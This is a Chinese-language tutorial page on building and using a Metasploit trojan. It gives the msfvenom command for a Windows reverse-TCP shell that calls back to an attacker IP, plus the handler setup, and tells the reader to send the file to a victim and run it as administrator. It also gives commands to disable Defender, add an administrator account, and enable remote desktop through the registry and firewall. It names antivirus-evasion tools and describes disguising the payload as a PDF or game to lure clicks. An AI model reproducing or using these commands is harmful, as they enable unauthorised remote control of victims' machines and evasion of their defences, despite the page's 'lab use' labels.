Skip to content

MSF 木马病毒

Metasploit Framework 是一款开源的安全漏洞检测工具,可以用于信息收集、漏洞探测、漏洞利用等渗透测试的全流程。

漏洞:在软件、系统或网络中存在的安全弱点或错误,可以被攻击者利用来获取未授权的访问、破坏数据、执行恶意代码等。漏洞可能是由设计缺陷、编程错误、配置不当或其他原因引起的。

  • IP: Internet Protocol(互联网协议)的缩写,它是计算机网络中用于标识和定位设备(例如电脑、服务器、路由器等)的一种数字地址。IP 地址是唯一的,类似于房屋地址,用于在网络上准确定位和寻找设备。
    • 内网IP:在局域网或私有网络中使用的IP地址;
    • 外网IP:在公共互联网中使用的全局IP地址;
  • PORT: 端口用于标识和区分不同应用程序或服务的数字标识符。通过 IP 地址来定位设备后,再通过端口号来定位设备上特定的应用程序或服务。
  • POC: Proof of Concept 验证,指验证是否存在漏洞。
  • EXP: Exploit 利用,指利用漏洞发起攻击。
  • Payload: 有效载荷,指 exploit(攻击)成功以后,真正在目标系统软件中实施的编码或命令

metasploit-framework 仓库:https://github.com/rapid7/metasploit-framework

官方网站下载:https://www.metasploit.com/download

安装成功后,在安装的目的找到 bin 目录,在 bin 目录启动CMD,

制作木马
bash
msfvenom -p windows/x64/shell/reverse_tcp LHOST=[攻击机IP] LPORT=[攻击机端口] -f exe -o shell.exe
监听木马
bash
msfconsole

use exploit/multi/handler

set payload windows/x64/shell/reverse_tcp

set lhost 0.0.0.0

set lport [攻击机端口]

run
发送木马到受害者电脑并且进行管理员方式运行

如果运行不了,可以运行命令进行临死关闭 Defender 实时保护

bash
# 临时关闭 Defender 实时保护(管理员运行)
Set-MpPreference -DisableRealtimeMonitoring $true

不建议永久关闭 Defender,因为它可能会导致系统无法正常恢复或被其他恶意程序感染。

基础命令与作用

命令说明
chcp 65001将字符编码切换为 UTF-8,解决命令行中中文乱码问题
systeminfo查看操作系统详细信息(如安装日期、补丁、热修复、物理内存等)
ver查看 Windows 系统版本
whoami查看当前用户
ipconfig显示本机网络信息(IP、网关、子网掩码等)
ping测试网络连通性(如 ping 8.8.8.8
dir列出当前目录下的文件和文件夹
cd进入指定目录(如 cd C:\Windows
shutdown -s -t 1010 秒后关机,可用于测试远程命令执行能力

用户管理相关命令(靶场测试专用)

命令说明
net user hack 123qwe@#$ /add添加一个名为 hack 的用户,密码为 123
net user hack /del删除用户 hack
net localgroup administrators hack /addhack 用户添加到管理员组(提权)

场景案例:开启远程桌面 + 防火墙配置(靶场练习)

启用远程桌面服务

bash
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

配置防火墙开放 3389 端口(默认远程桌面端口):

bash
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

使用工具对 Payload 进行免杀处理

Metasploit 默认生成的是裸 payload,非常容易被杀掉。我们要“包一层”进行混淆或加壳:

推荐的免杀工具(适用于虚拟机靶场)

工具功能开源地址
Shellter动态注入、加壳,生成免杀 EXEhttps://github.com/shellter-project/shellter
Veil-Framework自动生成加壳的免杀木马https://github.com/Veil-Framework/Veil

常见的木马渗透三步法流程(APT、小型 RAT、钓鱼攻击等)

阶段动作说明
1. 木马生成使用 Metasploit、Cobalt Strike 等生成 payload一般是反弹 shell 或 meterpreter、远控模块
2. 免杀处理加壳、混淆、加密、编译为 DLL、Shellcode Loader绕过杀毒、防火墙、EDR 检测
3. 伪装诱导包装成 PDF、EXE 安装器、游戏、工具等诱导点击伪装文件图标、加捆绑安装器、诱导执行

最后更新时间: